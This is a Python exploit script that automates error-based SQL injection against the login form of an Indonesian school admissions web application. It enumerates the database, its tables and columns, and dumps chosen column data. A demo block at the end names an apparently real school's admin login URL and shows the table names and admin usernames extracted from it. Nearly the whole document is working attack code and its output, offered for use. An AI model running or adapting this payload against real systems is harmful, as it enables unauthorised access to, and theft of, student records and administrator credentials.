Aplikasi PPDB Online - SQL-Injection Vulnerability

import requests
from os import system as c
from bs4 import BeautifulSoup

s = requests.session()
c('clear')
u = input('URL Target: ')

database = {"username":"' and extractvalue(0x0a,concat(0x0a,(select database())))#","password":"1","btnlogin":""}
db = s.post(u, data=database)
if 'XPATH syntax error' in db.text:
    pass
elif 'captcha' in db.text:
    print(f'AKSES DIBLOKIR OLEH CAPTCHA')
    exit()
else:
    print(f'TERJADI SEBUAH KESALAHAN')
db_soup = BeautifulSoup(db.text, 'lxml')
db_grab = db_soup.find_all('p')[1].text[22:100]
db_dump = db_grab.replace("'", "")
print(f'''[*] Database:
            {db_dump}
''')

print('[*] Count TB: ')
count = 0
while (count < 1000):
    tables = {"username":"' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit " + str(count) + ",1)))#","password":"1","btnlogin":""}
    tb = s.post(u, data=tables)
    if 'line' in tb.text:
        break
    else:
        pass
    tb_soup = BeautifulSoup(tb.text, 'lxml')
    tb_grab = tb_soup.find_all('p')[1].text[22:100]
    tb_dump = tb_grab.replace("'", "")
    print(f'''            [{count}]. {tb_dump}''')
    count = count + 1

tb_dump = input('\n[*] Pilih TB: ')
count = 0
while (count < 1000):
    columns = {"username":"' /*!and*/ extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name='" + tb_dump + "' limit " + str(count) + ",1)))#","password":"1","btnlogin":""}
    cl = s.post(u, data=columns)
    if 'line' in cl.text:
        break
    else:
        pass
    cl_soup = BeautifulSoup(cl.text, 'lxml')
    cl_grab = cl_soup.find_all('p')[1].text[22:100]
    cl_dump = cl_grab.replace("'", "")
    print(f'''            [{count}]. {cl_dump}''')
    count = count + 1

cl_dump = input('\n[*] Pilih CL: ')
count = 0
while (count < 1000):
    dumpdata = {"username":"' /*!and*/ (select 1 from (Select count(*),Concat((select concat(" + cl_dump + ") from " + tb_dump + " limit " + str(count) + ",1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)#","password":"1","btnlogin":""}
    dd = s.post(u, data=dumpdata)
    dd_soup = BeautifulSoup(dd.text, 'lxml')
    dd_grab = dd_soup.find_all('p')[1].text[17:100]
    dd_dump = dd_grab.replace(":1' for key 'group_key'", "")
    print(f'''            [{count}]. {dd_dump}''')
    count = count + 1

####################-( DEMO )-####################
#  URL Target: http://ppdb.mtsn1ponorogo.sch.id/panel_admin/log_in
#  [*] Database:
#              u6251098_sekolah_psb
#
#  [*] Count TB: 
#              [0]. tbl_web
#              [1]. tbl_verifikasi
#              [2]. tbl_user
#              [3]. tbl_pengumuman
#              [4]. tbl_pdd
#              [5]. tbl_siswa
#              [6]. tbl_pekerjaan
#              [7]. tbl_rapor
#              [8]. tbl_penghasilan
#  
#  [*] Pilih TB: tbl_user
#              [0]. id_user
#              [1]. username
#              [2]. password
#              [3]. nama_lengkap
#              [4]. level
#              [5]. tgl_daftar
#  
#  [*] Pilih CL: username
#              [0]. admin
#              [1]. adminppdb